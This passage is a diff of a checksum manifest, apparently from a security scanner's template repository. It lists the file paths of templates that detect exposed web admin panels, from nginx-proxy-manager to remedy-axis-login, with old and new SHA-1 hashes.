http/exposed-panels/nginx-proxy-manager.yaml:cbe5a23f32c9f95f9e4a914c4cf17d92c70ef5b5 -http/exposed-panels/nginx-ui-dashboard.yaml:002c8f54ee5b4ac3e34cf3400744f1962a05e84c +http/exposed-panels/nginx-ui-dashboard.yaml:147b049c755293b3d9c869f098519346dddd5c1f http/exposed-panels/ni-web-based-panel.yaml:1757bfbe129e69cbceae933ba2e363a706722866 -http/exposed-panels/nocodb-panel.yaml:ffc943fe01108681605e9b7d6de1337135224741 -http/exposed-panels/noescape-login.yaml:0b3c5482be852097436f3752c7b8bef46af30ea4 -http/exposed-panels/nordex-wind-farm-portal.yaml:47bbe33f1f70fbf777f7de634d2450980fe2ec4f -http/exposed-panels/normhost-backup-server-manager.yaml:748e55d91f0987a7b2142bba16382709a55797fe -http/exposed-panels/novnc-login-panel.yaml:8a00e069e684b8f8ea61b1ee56cdca135d74ac93 -http/exposed-panels/nozomi-panel.yaml:cc1d92bfc2685da1d80ea2c9d96c369165df21bf -http/exposed-panels/np-data-cache.yaml:3cee24c30bedb32a2a1af3af957d88d233cbedfc -http/exposed-panels/nport-web-console.yaml:82faafddaae5e8bf8bc99268b3679f5c97183e11 -http/exposed-panels/nsq-admin-panel.yaml:4b882a1589530a4f2030790caf4a7d0b2927a8ac +http/exposed-panels/nocodb-panel.yaml:d81b61d03f4db94b67eefa9013d09d19f7f9149e +http/exposed-panels/noescape-login.yaml:dc4477a544347a0f3e6841a72d3837aa5a971edc +http/exposed-panels/nordex-wind-farm-portal.yaml:67ed8841875733a566f80cefcf9f70df51dd3420 +http/exposed-panels/normhost-backup-server-manager.yaml:ef6c29a8920fd86f16df6576da917196fe22a7c9 +http/exposed-panels/novnc-login-panel.yaml:7543f5f3cebd99e883f605904d1ed677c6ba07cc +http/exposed-panels/nozomi-panel.yaml:fe82922fc71d2276b14608adc9640f3dfa8791ca +http/exposed-panels/np-data-cache.yaml:f3d25a3fda2ce5ab7d7b583aa5b34418d19151a6 +http/exposed-panels/nport-web-console.yaml:9f1bec8e0bf84a47e966ded3a8f284bb11b73893 +http/exposed-panels/nsq-admin-panel.yaml:78e3f9b5c3cdb303a3d992e023ba59c5ccdb4049 http/exposed-panels/nutanix-web-console-login.yaml:df6a3a4083d72a140d99aa157d5a330962691234 -http/exposed-panels/nuxeo-platform-panel.yaml:8c8f67e10579f31f036c2445c484226aba803a69 -http/exposed-panels/nzbget-panel.yaml:e33cbcd6d41712d2278c52fcfdc5caf67d0b4a28 -http/exposed-panels/o2-easy-panel.yaml:8f4eaf111795fe7f8b2cca2e2191458dcf91935d -http/exposed-panels/ocomon-panel.yaml:ca820eaab46a62e5fc2c753169dac803a5c1e740 -http/exposed-panels/ocs-inventory-login.yaml:3081e28e073a4f169de81de9cc0ba506985bb2e8 -http/exposed-panels/octoprint-login.yaml:9080fb7bc71b2c383b2d9de5423abdb12cd5b7df -http/exposed-panels/odoo-database-manager.yaml:037c89e1ff9f7694cec2a7a354c2d3321f279707 -http/exposed-panels/odoo-panel.yaml:cd3d2c54eeae9d6aae9ad8a800cb3c7b51c7e3d6 -http/exposed-panels/office-webapps-panel.yaml:6c63d0c45374c5a370095ff2f2cd835fb33eaf72 -http/exposed-panels/officekeeper-admin-login.yaml:48776c65677c557b2a2c059a77306bc8e91bcd15 -http/exposed-panels/oipm-detect.yaml:ca1eed07e7c1822540a91792e952723bc34d28c3 +http/exposed-panels/nuxeo-platform-panel.yaml:c61b181ae59acf7320db8801bac4bb2f615bbb83 +http/exposed-panels/nzbget-panel.yaml:e4264ff888dd1f4222f908e8bb90107752e674d5 +http/exposed-panels/o2-easy-panel.yaml:b7f65afd01b55f9ecfee9b3455f647e9e867af79 +http/exposed-panels/ocomon-panel.yaml:3412805fe1efbb6941d12baeb99ed7856d3d9aac +http/exposed-panels/ocs-inventory-login.yaml:d8752bac17f61198bd3625ac368e92b3b464d3da +http/exposed-panels/octoprint-login.yaml:f54015c4c74d05020a80c55b4cb701e363612508 +http/exposed-panels/odoo-database-manager.yaml:2b3326327212211ab7def88adf6a31635c41d0a1 +http/exposed-panels/odoo-panel.yaml:1305b48ad4ece050e6e75af9ba5dac08f837b0d8 +http/exposed-panels/office-webapps-panel.yaml:0834040aa1cb69d33bc541f1187f67f81d64d59f +http/exposed-panels/officekeeper-admin-login.yaml:85cf7451ff32676087d803867e0144e8541e7561 +http/exposed-panels/oipm-detect.yaml:7531a89d2cc8a85aac8d226d35b8dfb429c3bd8f http/exposed-panels/oki-data.yaml:916926204d9d0baad24e04f9a217e4a03af5ebe4 http/exposed-panels/okiko-sfiler-portal.yaml:2e8e6212d4385e6af1a12f221aadd7f27e0dc856 http/exposed-panels/okta-panel.yaml:64fa8108ebfc1fd6095fdc94addba67aefdb8547 http/exposed-panels/ollama-llm-panel.yaml:d19589a85d32d242a50066ba2676a6ed2f6ad498 -http/exposed-panels/olt-web-interface.yaml:029adc5fdd82494d3714c49094637f64c21c0fdd -http/exposed-panels/omniampx-panel.yaml:94d17405d7b9357e6129d12387715508b4004406 -http/exposed-panels/onlyoffice-login-panel.yaml:2f439d6f123ca04df17073347bfbbb9d47d5cec2 +http/exposed-panels/olt-web-interface.yaml:bd13acc8c195cbf26aa41fe65aa499740e6332e4 +http/exposed-panels/omniampx-panel.yaml:68ef0ac4ffde1f1684c08a48f453510364e9b4ed +http/exposed-panels/onlyoffice-login-panel.yaml:044f6d420976bc9f2a4063cfe33d22ab3b4ea351 http/exposed-panels/open-game-panel.yaml:59efeff7e08a70e689ab77521a82be8e41709028 -http/exposed-panels/open-stack-dashboard-login.yaml:2251e6433b7726ea3568bd7639a5364a8f64d2eb -http/exposed-panels/open-virtualization-manager-panel.yaml:e17894edaaff390d2d8241d0e0aded446304f74b -http/exposed-panels/openam-panel.yaml:eb2052dcb5e1f4cddb0e9d6fa24ecb7925cc346d +http/exposed-panels/open-stack-dashboard-login.yaml:17ecc7048782a820b12506029a9a1dcc31dd86dc +http/exposed-panels/open-virtualization-manager-panel.yaml:8c036c7b81b5e866a206a0cb8a2acd199dcc6f30 +http/exposed-panels/openam-panel.yaml:05e071537e29b5d4f2cd28a8e1460977e942d7d8 http/exposed-panels/openbmcs-detect.yaml:2292b4e9709678ec63cff1100da7443df6599004 -http/exposed-panels/openbullet2-panel.yaml:eec0fc3ab011c9946fb8edbb7463d3d599014456 -http/exposed-panels/opencart-panel.yaml:5b11231807d199048c41e4f850a439f69beff673 +http/exposed-panels/openbullet2-panel.yaml:1acf0d9b049f5670a34b7169b5fa5606bc270d4d +http/exposed-panels/opencart-panel.yaml:52ee874f3db243eb126142b915e23017a4a0b562 http/exposed-panels/opencast-detect.yaml:f6877013be4f0aba543e20f10cb710ba35dcfcd4 -http/exposed-panels/opencats-panel.yaml:6cb9bb3bb205a57ee47140d2d5a5d7e2daa29255 +http/exposed-panels/opencats-panel.yaml:59f5d4a4cb6d95c8f323d028c624fb2c8f8b8908 http/exposed-panels/opencpu-panel.yaml:a48c6768a838e2418f0fc4d5794c6bd7587eb57d -http/exposed-panels/openemr-detect.yaml:94edc02c899dbd56b9484c5bd25a8242963c4fb2 -http/exposed-panels/openerp-database.yaml:1e182e703e3492d5f7678c4c5105e374eb1c2425 -http/exposed-panels/openfire-admin-panel.yaml:49cea49fc704dc5f78ebc70fdc3c76acb2d906a9 -http/exposed-panels/opengear-panel.yaml:8cf51223cdaab364bcfd38416d794f10aea85fde -http/exposed-panels/opennebula-panel.yaml:38f44bd8ab3be4fd099e8528f921d3ad621c3f12 -http/exposed-panels/opennms-web-console.yaml:5be7e698fd0df112a8b214160797c75bc63375c0 -http/exposed-panels/opensis-panel.yaml:a76ca206b65ac9f71aca222857d6ee86fa654796 -http/exposed-panels/opentouch-multimediaservices-panel.yaml:f886bcf9235a5657eb2df98baf57f95ea122a3ee -http/exposed-panels/openvas-panel.yaml:37d20068a7dcbda8b23d01a1f994c87e58e8ee98 -http/exposed-panels/openvpn-admin.yaml:21ab0b8ff6e844291175b8c8d1977c974fdcc449 -http/exposed-panels/openvpn-connect.yaml:cf9eb38c6c496d1e464dc2ec0e74b0f9978de638 +http/exposed-panels/openemr-detect.yaml:339d95704a9a2f7d7955b4419bbab0a63b800985 +http/exposed-panels/openerp-database.yaml:9feeb44dc6148961d004517eb39b6ed3aee5805e +http/exposed-panels/openfire-admin-panel.yaml:15c0c527bb48b8cbb9ace9d5b7e601a31668266c +http/exposed-panels/opengear-panel.yaml:5dfa8e1559198420f02c167a721165a678417100 +http/exposed-panels/opennebula-panel.yaml:8fcb265b60a1db45f5f3738b5c0f64a823b8ee17 +http/exposed-panels/opennms-web-console.yaml:57712e8d0f5aef99e57e07e5f854e3ae5dac26f2 +http/exposed-panels/opensis-panel.yaml:ba47b47aa1eb12872462ea9bee766e1a3d7aea3c +http/exposed-panels/opentouch-multimediaservices-panel.yaml:523568da0caa22ee5e83843098f9a2c8be2ec510 +http/exposed-panels/openvas-panel.yaml:d9ee548226ff959a83f49fb2ac81e1b81ab82c19 +http/exposed-panels/openvpn-admin.yaml:20ab56ffbeb1deab7119ef93ce45f9ec73158f3f +http/exposed-panels/openvpn-connect.yaml:7fe0ca04324cde5bba13f6d8b53b4a58c45b09ea http/exposed-panels/openvpn-monitor.yaml:8bdcaa711f6852aeae49b0dde458dd17ed94f146 -http/exposed-panels/openvpn-router-management.yaml:414d6579e300cad6d3393ba93f28cdadc8d662b5 -http/exposed-panels/openvz-web-login.yaml:093ed9de70c758d05edb36313fe0f691698d44d9 -http/exposed-panels/openwebui-panel.yaml:66953ea37027743b84f8166f931277f0f40a1590 -http/exposed-panels/openwrt/openwrt-luci-panel.yaml:40c17051e2bf9582aba58554dcc8b47236992d29 -http/exposed-panels/openwrt-login.yaml:bf71548bd02ddda858eee7c9c81b2d605160fadd -http/exposed-panels/openx-panel.yaml:9a251ee72f83a54066ea4b66477e0315e3738f62 -http/exposed-panels/opinio-panel.yaml:876bd7c1d066c2fa315ac4e97b8068cdde971194 -http/exposed-panels/oracle-access-management.yaml:58d21f281579879b938eecf90ac9aa0dff636cdd -http/exposed-panels/oracle-business-control.yaml:49cc7edb62c2ed58e0fcbe8d166d5333a610f00d -http/exposed-panels/oracle-business-intelligence.yaml:9c840a9a52a59d64cd21e8af03436a47baa19e42 +http/exposed-panels/openvpn-router-management.yaml:007c6acf931eaf3c0534ec7b7ba71a63d73078c7 +http/exposed-panels/openvz-web-login.yaml:21e17e683a3bae37cfa64fa639b977aeea66aa4a +http/exposed-panels/openwebui-panel.yaml:7283da9d837435a5f822ed4a3933215a47d85039 +http/exposed-panels/openwrt/openwrt-luci-panel.yaml:febe3d6a5d8a924101aa57af18f4f1f4bbb95a86 +http/exposed-panels/openwrt-login.yaml:02835853df67ba3e6ea1fbe2c3be8843c2a407b3 +http/exposed-panels/openx-panel.yaml:3774c5c5c1e2a7caa2b39db7861fcdc76703e198 +http/exposed-panels/opinio-panel.yaml:12e7ff620ba48be41041e69d29540be880124b16 +http/exposed-panels/oracle-access-management.yaml:fcbfc34e8c844436c6ab5bc7880885da946e48b4 +http/exposed-panels/oracle-business-control.yaml:4577f0690dc1b4ab93fa5d411666e34c94ef027c +http/exposed-panels/oracle-business-intelligence.yaml:996e0ae7577d365ca72badd9770eda29d4b9ce86 http/exposed-panels/oracle-containers-panel.yaml:5ff1a1b8e8025efcd64744c2f89e9cc2132b40d1 -http/exposed-panels/oracle-ebusiness-panel.yaml:11ce5f8eac0d77689fffc78b24824a09e59d3002 -http/exposed-panels/oracle-enterprise-manager-login.yaml:4f6034321a1adc54248243fbccd919294a01216e +http/exposed-panels/oracle-ebusiness-panel.yaml:f0a179a6ebd41570036b2788089f6f4598320002 +http/exposed-panels/oracle-enterprise-manager-login.yaml:32013da4d93dfc01d4f1224a9a52ad140047d64f http/exposed-panels/oracle-integrated-manager.yaml:33fabda935c2ddc490939f8e5d5abc27fd5f1f49 -http/exposed-panels/oracle-opera-login.yaml:76d5bec17469179407128b639e474e0769ee2af0 -http/exposed-panels/oracle-people-enterprise.yaml:289ef46924d2998368c9c28247abb68160cefb26 -http/exposed-panels/oracle-peoplesoft-panel.yaml:0ddd04a11303ed51591ea5f63d295b9d4c047ee8 -http/exposed-panels/orchid-vms-panel.yaml:26907797826f5fd112ab68de00af9d047536a064 +http/exposed-panels/oracle-opera-login.yaml:7d2f000e691c5b565bbe0c951a02727bebb8d5e2 +http/exposed-panels/oracle-people-enterprise.yaml:9bafef4f2eb7f888cb7a93e424cfdb3692c0a0ca +http/exposed-panels/oracle-peoplesoft-panel.yaml:7b96676f153664b0cebd6e8305a09dead7f8c99c +http/exposed-panels/orchid-vms-panel.yaml:d729e52616e051743bf5974a0d95bea1faaa9e4d http/exposed-panels/osnexus-panel.yaml:1397581ae2c1d7c2943eac8291ce75e8444bcf09 -http/exposed-panels/osticket/osticket-install.yaml:6765bbacebe94aa7989e0917ee0ad7d5e555674b -http/exposed-panels/osticket-panel.yaml:43928fa4db2ea3f8e4974c4a20885ad52c8ccbdc +http/exposed-panels/osticket/osticket-install.yaml:06d89f97b70a19bcabec92e04f0bfcebe3831341 +http/exposed-panels/osticket-panel.yaml:bb0be330072571f95a0e45a0c647cb31bd27d525 http/exposed-panels/otobo-panel.yaml:312246ef4c251b722091e452d581f427551204ff -http/exposed-panels/ourmgmt3-panel.yaml:a6036af7f001f941556e5b83bf2ac2ed3fe04500 -http/exposed-panels/outsystems-servicecenter-panel.yaml:9a8a06260f21595dade6ffb65a9e5317d849d655 -http/exposed-panels/overseerr-panel.yaml:9f4f4767aaa56fb0dba40fb7d3feaeb064b5b689 +http/exposed-panels/ourmgmt3-panel.yaml:2db65c16dda6702dbafabeed82d15c4a7abe28e6 +http/exposed-panels/outsystems-servicecenter-panel.yaml:5eb701e0eb5a0c688499c491691909ceb475b9ae +http/exposed-panels/overseerr-panel.yaml:d4be4ad36cbde9ff184205fe30b46ceb8635e062 http/exposed-panels/pacs-connexion-utilisateur.yaml:b76d85aa17275933bfee31bd63d62a36e8c050e0 http/exposed-panels/pagespeed-global-admin.yaml:96c612151fc6efa226c0ebbf6d440609dba39ff7 -http/exposed-panels/pahtool-panel.yaml:ee041dadd5251cfcd786e539930da51848370fce -http/exposed-panels/pairdrop-panel.yaml:dc6f595eb481147e646230dc1fd3f6dfcba33d69 -http/exposed-panels/panabit-panel.yaml:5bc58c25a3debee9a0f025f3113591061d21d78f -http/exposed-panels/pandora-fms-console.yaml:93fb60c2b2f8d716ae6a03062523495004d05aa0 -http/exposed-panels/papercut-ng-panel.yaml:8afb370eec63bc4a195262614158bf43ced1d304 -http/exposed-panels/parallels/parallels-hsphere-detect.yaml:21a896aa4d7a3c8942bc4333ce50226fde9268d5 +http/exposed-panels/pahtool-panel.yaml:4fbe84f98073f39239a3ef4b5c63000955a76f1b +http/exposed-panels/pairdrop-panel.yaml:db53055257001b938b366e2f1fea93cc68203052 +http/exposed-panels/panabit-panel.yaml:74efa0bec17bcad5eb702fadc11ccf8517d2e976 +http/exposed-panels/pandora-fms-console.yaml:54f725d5b05ecaf74ebe03e10864483fd881dcda +http/exposed-panels/papercut-ng-panel.yaml:775834276ae27186fae347b6d1700c02bc8fc0c7 +http/exposed-panels/parallels/parallels-hsphere-detect.yaml:f69634e5989f1fd8a65fc7f0c0fb0159ebf07f9a http/exposed-panels/parallels-html-client.yaml:c42097fc61369b15b2b52f6a439d183ff165a8d4 -http/exposed-panels/parse-dashboard.yaml:31ee52e3b0aeebf25a2e4140e35060a0e5f393d2 -http/exposed-panels/passbolt-panel.yaml:12b364fc011ccdef5f8957c1c89669a0211db657 -http/exposed-panels/payroll-management-system-panel.yaml:6c8aa792573bcac91fee77bd750e1f9109813dd4 -http/exposed-panels/pdi-device-page.yaml:2eee00767e2e63f054894f6718e14d6429b3d3d9 -http/exposed-panels/pega-web-panel.yaml:bcbca900d857f787bab8139cee11edcbace1d1bb -http/exposed-panels/pentaho-panel.yaml:d73c03b3895dcd764e7d3348960023b410c26a99 -http/exposed-panels/persis-panel.yaml:6d34a0d2e8e09e65768c6f5c0fd9b713d6f35335 -http/exposed-panels/pfsense-login.yaml:3f200f8c64a598dd52ee1bab2287059c22a82626 +http/exposed-panels/parse-dashboard.yaml:4f790463bb556351a682153147c0da4000d4a724 +http/exposed-panels/passbolt-panel.yaml:cbeb9471607f1c9f698b8e05122a85daf88d390d +http/exposed-panels/payroll-management-system-panel.yaml:665306db1782b706672e6bdd71f9d71442659803 +http/exposed-panels/pdi-device-page.yaml:ea3d9b679af52d10a37d17bb2c4bc01cd9d49830 +http/exposed-panels/pega-web-panel.yaml:5d72af3dabef74c0ff5b3114d7c52cd14a3d29c0 +http/exposed-panels/pentaho-panel.yaml:c4145d657a8066642c82fc94e48f742bf837894d +http/exposed-panels/persis-panel.yaml:6095399317c33c6bfa8a7ef77175c2fde909e3bd +http/exposed-panels/pfsense-login.yaml:0b66f328340c1f3769f381f3feba992ddc8b1ed3 http/exposed-panels/pgadmin-exposure.yaml:9223165b5f174a75d355a3e88d1df4c0d37e3040 -http/exposed-panels/phabricator-login.yaml:5d45ed424f58442e7f0f53edd2c4b87e759d8f6a -http/exposed-panels/phoronix-pane.yaml:a9a3e08c0fc8ededb26f119ef48c8fc0aed4417b -http/exposed-panels/php-mailer.yaml:6484a829a40e67612555caf176d3a2e14d9667c5 -http/exposed-panels/phpcollab-panel.yaml:e790b33af60f820b742ccad3078a0b89b3afbb23 -http/exposed-panels/phpldapadmin-panel.yaml:e911cef61404fbbea367f720eacd1fed74e98946 -http/exposed-panels/phpminiadmin-panel.yaml:633c836d1f5f01f06973841438eb97a831501b71 -http/exposed-panels/phpmyadmin-panel.yaml:72d61ed4fde0c716d1f36529ccaf70992540c45d -http/exposed-panels/phppgadmin-panel.yaml:0990d0bbf992a52eba48e9a964f45a4d0ae865af -http/exposed-panels/pichome-panel.yaml:0eda128a5f2a2773dc6c7584667dcdf45b176c9d -http/exposed-panels/piwigo-panel.yaml:7b8fb4c3735bf6813d5ae8cde6fe30c2987fc590 -http/exposed-panels/planet-estream-panel.yaml:bf5cb52c8ccd15ac05c863e2c2d7fe42d1a9acf8 +http/exposed-panels/phabricator-login.yaml:97b044b453230932d49580be0dce2fc63b69771f +http/exposed-panels/phoronix-pane.yaml:dba45e1c43338a4d890cf77140c783ed37dbb00a +http/exposed-panels/php-mailer.yaml:e0bbb9a553f3735f40566c124dda9c631cd04b77 +http/exposed-panels/phpcollab-panel.yaml:5b50e694b142beed4a748affe100404783a8efcf +http/exposed-panels/phpldapadmin-panel.yaml:5dbb7b1ddd94f9e8251881bc87cf53ba7ba9fd63 +http/exposed-panels/phpminiadmin-panel.yaml:9eea7c9d3eba0643dd266f71c3ecf0f0fe0af241 +http/exposed-panels/phpmyadmin-panel.yaml:f0b3d4ceea233ec10cd2c1dbafaa264c452126b4 +http/exposed-panels/phppgadmin-panel.yaml:1d6263c233aaa53577a9f051b902341f39d02757 +http/exposed-panels/pichome-panel.yaml:64ef65545069e4d62fb7a56eefa9a0728ddf88d9 +http/exposed-panels/piwigo-panel.yaml:a2db27c4812f057d98df789a4cc12bb167fc2d1a +http/exposed-panels/planet-estream-panel.yaml:11cd2b4769d8ba00ad0f8dfd8d45e8565fbc651f http/exposed-panels/plastic-scm-login.yaml:fe6d092c51727b09cb9451654271bd3e5e674a71 -http/exposed-panels/plausible-panel.yaml:8a508565c07003a3d51357ad2f97c5272b54f14e -http/exposed-panels/plesk-obsidian-login.yaml:504284bd19da05c5b4286f6b26e933bb47ac54d5 -http/exposed-panels/plesk-onyx-login.yaml:991a3f9d80768946d9089fb94856aa68ee921d9a -http/exposed-panels/pocketbase-panel.yaml:b416e94f4cceebb151bfe73d78be881234f33542 -http/exposed-panels/polycom-admin-detect.yaml:25f333ba200ec3b31a8f96469f46e1ce9d492847 +http/exposed-panels/plausible-panel.yaml:b9fc5cae87205f4a19b81af173663f94c7db8993 +http/exposed-panels/plesk-obsidian-login.yaml:bf30291901bfcd5a54f0380759f899d4bd0050f9 +http/exposed-panels/plesk-onyx-login.yaml:0da4c87ce43cf6594441ccaabe37493ce1e15015 +http/exposed-panels/pocketbase-panel.yaml:305b1b71cf732bd8ad9baf72d18347f7a22185e1 +http/exposed-panels/polycom-admin-detect.yaml:dff70bdcc0bf44910793ba68d7ca40de942da801 http/exposed-panels/polycom-login.yaml:9dfb75c477c1d850cb3c4e767e5f1027c65c7e01 -http/exposed-panels/portainer-panel.yaml:85d26f069e2b959afc5e2a4d91d1904452ecd62c -http/exposed-panels/posteio-admin-panel.yaml:918aeedd672fd3e17744efc5ead02d93e21c9d8d -http/exposed-panels/posthog-admin-panel.yaml:6a003857b738f49945ed23af8d4eb8d7907b766a +http/exposed-panels/portainer-panel.yaml:de67afbeb07653c2658d34e6d5df07e05dc74fe9 +http/exposed-panels/posteio-admin-panel.yaml:f680d436a3b8aebc8417558d0984fc47ae06ca57 +http/exposed-panels/posthog-admin-panel.yaml:1e22aedcd61baa8ad600c0a7f2617687a55d3a8d http/exposed-panels/powerchute-network-panel.yaml:2f0d91f39e11fb2b5f885ee99b24fedb224e8c87 -http/exposed-panels/powercom-network-manager.yaml:c48411be49d4b03bc6eaa6a6b47bacd3a962c1cb -http/exposed-panels/powerjob-panel.yaml:ae6332dafba4e8b5b42b210c8f78e9a7b0890848 -http/exposed-panels/powerlogic-ion.yaml:63ec6909ba31b8095ef9a6e1f744b956a08416f4 +http/exposed-panels/powercom-network-manager.yaml:9d0afc677c681ee3f230af35bb29dd4f194e73c8 +http/exposed-panels/powerjob-panel.yaml:44d83ffd27b484c0331a4a7f42b8401d645ef78a +http/exposed-panels/powerlogic-ion.yaml:d5ab1ee1c48496083b67ab3809aaad5451b1ae89 http/exposed-panels/pritunl-panel.yaml:238b0e6d106843260148ae5dffcd530fa587c1eb http/exposed-panels/privx-panel.yaml:8bc94fa84060bd1664dccb375d8c90c9d53755f0 -http/exposed-panels/processwire-login.yaml:9fd9cd343eb2bb90237dc155aec342fc6df8bbed -http/exposed-panels/project-insight-login.yaml:b77199c57bd2c66bf0983265a488770d8805c41c -http/exposed-panels/projectsend-login.yaml:0f8c8a10ba969b42518741754ebfc4267687d77f -http/exposed-panels/prometheus-exposed-panel.yaml:639e2ce0f6abd2e535bd0a1b4e3d4b831573ae11 +http/exposed-panels/processwire-login.yaml:ac45c2086dc9082c5760b00aa9680c7456590c6a +http/exposed-panels/project-insight-login.yaml:0d3937a716d80d09f36c48b8e07854cd5fa340ee +http/exposed-panels/projectsend-login.yaml:3593a5dc84e12ef960d725cf60dd788d83109095 +http/exposed-panels/prometheus-exposed-panel.yaml:9b12cf516383a4d1faa3eae7b231d591fde5e8af http/exposed-panels/prometheus-pushgateway-exposed-panel.yaml:857368867accf4ad72596e16f2f0d90e100a029c -http/exposed-panels/proofpoint-protection-server-panel.yaml:6bb2ded05af3f30f9558194b9e223e91996d9eda -http/exposed-panels/proxmox-panel.yaml:474b23aa216b3be55eeb0b4f0b52e038e2c3272b -http/exposed-panels/pulsar-admin-console.yaml:21ed2cd8c1c5241a821048761a2a8d8630766f4c -http/exposed-panels/pulsar-adminui-panel.yaml:98b91e6063948c15519d4c1c8fb5b3e5657d2b71 -http/exposed-panels/pulsar360-admin-panel.yaml:cd7559eff72ee6f8e9c4752ec2b870c9c4056121 +http/exposed-panels/proofpoint-protection-server-panel.yaml:3629279bf71331fe3cc0b189af59aad2adc4f3aa +http/exposed-panels/proxmox-panel.yaml:103760be7badab8222448a8f34846216a4eec8a0 +http/exposed-panels/pulsar-admin-console.yaml:7dd4f6c7fd3bb1d9fde8abf4148bb36e33a717e3 +http/exposed-panels/pulsar-adminui-panel.yaml:b6c8de687b1eb1dd9f120ee4fdd7b050b3f824a4 +http/exposed-panels/pulsar360-admin-panel.yaml:b6ff84cf50a37e88d07d858bbbdc0b1ad3d58cf6 http/exposed-panels/pulse-secure-panel.yaml:ed68474661e85ca870ab17f4ce4c9a53665b3dc0 -http/exposed-panels/pulse-secure-version.yaml:cf36258eb57e7ac7cbc977d229ba17097cdbf1f9 -http/exposed-panels/puppetboard-panel.yaml:52145461176e57c84805cb89b1dcce855e83116a -http/exposed-panels/pure-storage-login.yaml:f12e4d56041cc8b570a1567d0159f66fa49e8264 -http/exposed-panels/pyload-panel.yaml:94a6cbe7feed58e3fe68e0f43216e766928cc42b -http/exposed-panels/pypicloud-panel.yaml:ee8c8c7ea0ec112cb52d54371044a6bb213743fd -http/exposed-panels/qBittorrent-panel.yaml:af5b4b89d7b46f7d9d874778aab6bcd6238501bb -http/exposed-panels/qdpm-login-panel.yaml:6d39a304f76a3d3a459cf3a21b468a1167bff643 -http/exposed-panels/qlik-sense-server.yaml:dc2b3093e9466acd247305cfe04a5335563838c4 -http/exposed-panels/qlikview-accesspoint-panel.yaml:80522a3fcc30c0da6f501072ee467c6ecfab289e -http/exposed-panels/qmail-admin-login.yaml:bddc5bcfc8782606ac9a327d4b5416946806291c -http/exposed-panels/qnap/qnap-photostation-panel.yaml:43d4038f300379c55db6ce2b538a5ec49536fed3 -http/exposed-panels/qnap/qnap-qts-panel.yaml:13ab1eab4b14950f82bc7621709b7e0bf93bc566 -http/exposed-panels/qualcomm-voip-router.yaml:2b6a658c65424618c87db442d4d15bcb403ad442 -http/exposed-panels/qualtrics-login.yaml:11b89e24131f71c3665aa61461023a262c5b5e51 -http/exposed-panels/quantum-scalar-detect.yaml:04c64cfa7420f7e9efddb33a03aef1f06623eceb -http/exposed-panels/quilium-panel.yaml:4dc9d0126f6332cf597a93d6284bfa796cf9231d +http/exposed-panels/pulse-secure-version.yaml:0994d5ae7d13291231994ce1c703a86d2b36e8b9 +http/exposed-panels/puppetboard-panel.yaml:cf0d5437078a72b9acc5f61fa1f8ac1bfb7fa83d +http/exposed-panels/pure-storage-login.yaml:72b0abcb384681aa16d11f60c8a69b471f01203b +http/exposed-panels/pyload-panel.yaml:cc78659754704699f72001c69de6af0ec349d9cc +http/exposed-panels/pypicloud-panel.yaml:4bb4fe41b195c4021575f9956c494eb98778b6c8 +http/exposed-panels/qBittorrent-panel.yaml:f47ab81442c260685f6ddb541b0f84f521a71d07 +http/exposed-panels/qdpm-login-panel.yaml:c7a2218d7429e53522028e279663c66f7cb4f4bd +http/exposed-panels/qlik-sense-server.yaml:17aaf22b2dbeb494237224572d86db961f8bc9e8 +http/exposed-panels/qlikview-accesspoint-panel.yaml:36442e2db7d0ad51e5fb9be4db06a3c89c222a89 +http/exposed-panels/qmail-admin-login.yaml:3ea2784b526f49d36c428acdcdec52d14fe5d062 +http/exposed-panels/qnap/qnap-photostation-panel.yaml:33f4d750e1bb537f586a3a1bc8072ebd3153d2e8 +http/exposed-panels/qnap/qnap-qts-panel.yaml:082568ea7a2d67ea0a40badd4bc2dfe16628edb0 +http/exposed-panels/qualcomm-voip-router.yaml:b7b4c26d885abde017f7f8e2420ad8b48d029af5 +http/exposed-panels/qualtrics-login.yaml:58c98ac4f488d059cf6176f0156c8db6465c8709 +http/exposed-panels/quantum-scalar-detect.yaml:3da6dbde9697dabaedc01804afd3ff72c70b69c0 +http/exposed-panels/quilium-panel.yaml:1ada209efd8dc4f91d54e33eac4d1186823e3b0e http/exposed-panels/r-webserver-login.yaml:b901e835e99e9315dc07c8e01a9f1a9803e26349 -http/exposed-panels/rabbitmq-dashboard.yaml:30e95be944c708b7f3469536db1f761bbedfc461 -http/exposed-panels/racksnet-login.yaml:e75afea84f82cd9d556b17ec05f24f5447a38903 +http/exposed-panels/rabbitmq-dashboard.yaml:c5398705fd7df6f358db182a2ab6671e26203361 +http/exposed-panels/racksnet-login.yaml:eb2baee1ffec4bafab512bdfce40837fe9078e10 http/exposed-panels/radius-manager.yaml:60d4f6f125af90ac3eecd8537ab50ca567f73e22 -http/exposed-panels/rancher-dashboard.yaml:76f343231f55b13878fce8a4b223f397adc37150 -http/exposed-panels/rancher-panel.yaml:b093246c36791871784b967319bd4f9d35bcd3de +http/exposed-panels/rancher-dashboard.yaml:936383df8617d172f95ebaaa992abe23c6f92abb +http/exposed-panels/rancher-panel.yaml:6de29d4dbd926d4bc749a0c21960f45e27629b81 http/exposed-panels/raspberrymatic-panel.yaml:c5092f2f1d95cf09589e5326cc291b0631391693 -http/exposed-panels/rcdevs-webadm-panel.yaml:b7b29f2f27c738021c132bb45a7b0fd8b1268536 -http/exposed-panels/rdweb-panel.yaml:a954aba7d1838a79f772f815c1c885dee015c9ca -http/exposed-panels/red-lion-panel.yaml:888b3659332ce755428175a2135a37757273a63b -http/exposed-panels/redash-panel.yaml:f0ed680f08c195db942dd7849e6f48800def0ba1 -http/exposed-panels/redhat/redhat-satellite-panel.yaml:15234eeb3b4dfa93b28515ac84c38d0aa2d0c459 +http/exposed-panels/rcdevs-webadm-panel.yaml:d9d3b6906decb885a62173f87292ce6891ca664e +http/exposed-panels/rdweb-panel.yaml:32ff16eb4457219607167d30808907b4ed798b49 +http/exposed-panels/red-lion-panel.yaml:01f104becbb1e2ef93478cee896e0e30c34ddffb +http/exposed-panels/redash-panel.yaml:a9d4f1cf34b139a8f98d02ec44957663f7eb4b99 +http/exposed-panels/redhat/redhat-satellite-panel.yaml:6ac2c71c8407bb1ab36d93d2843df615ab178030 http/exposed-panels/redis-commander-exposure.yaml:9f806530bb77a8e21240a0b569f4bfc6624030e1 -http/exposed-panels/redis-enterprise-panel.yaml:c197f21c6c0cbb1102f3cc701dbc2f8a32c387fa -http/exposed-panels/redmine-panel.yaml:ba81080a5c084269044531056576a3aebf080bb0 -http/exposed-panels/regify-panel.yaml:90030d14bb1e0f41f66b7c389a9503c363b58730 -http/exposed-panels/remedy-axis-login.yaml:b9728abe826352ce5213d91b055aa87817ad91b8 